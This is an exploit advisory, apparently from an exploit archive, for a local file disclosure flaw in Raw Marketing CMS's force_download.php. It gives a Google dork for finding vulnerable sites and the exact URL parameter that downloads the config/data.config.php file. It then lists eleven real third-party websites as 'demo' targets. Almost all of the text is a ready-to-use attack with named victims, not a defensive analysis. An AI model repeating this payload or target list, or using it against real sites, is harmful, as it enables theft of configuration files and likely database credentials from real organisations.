######################
# Exploit Title : Raw Marketing CMS LFD
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://raw-marketing.com.au/
# Google Dork : intext:" Website by Raw Marketing"
# Date: 23 May 2016
# Tested On : Kali
# Contact:n3t.hacker@gmail.com
###M##################
# Vulnerable File : force_download.php
# Request Method: GET
# Describe : Search dork and select Target. Put /force_download.php?path= After url such as :
# http://site.com/force_download.php?path=config/data.config.php
#
# Now You Downloaded Config File.
#
#
# Demo :
# http://bubsonboard.com.au/force_download.php?path=config/data.config.php
# http://www.kathmanducuisine.com.au/force_download.php?path=config/data.config.php
# http://atvlifeguards.com/force_download.php?path=config/data.config.php
# http://matthewdamesmusic.com/force_download.php?path=config/data.config.php
# http://www.riverwalktasmania.com.au/force_download.php?path=config/data.config.php
# http://sparksbuilders.com.au/force_download.php?path=config/data.config.php
# http://ntfua.com.au/force_download.php?path=config/data.config.php
# http://www.museumofrarefindings.com/force_download.php?path=config/data.config.php
# http://www.rotaryclubofsullivanscove.org.au/force_download.php?path=config/data.config.php
# http://www.gowrie-tas.com.au/force_download.php?path=config/data.config.php
# http://tasbeauty.com.au/force_download.php?path=config/data.config.php
#
#
######################
# discovered by : Net Hacker
######################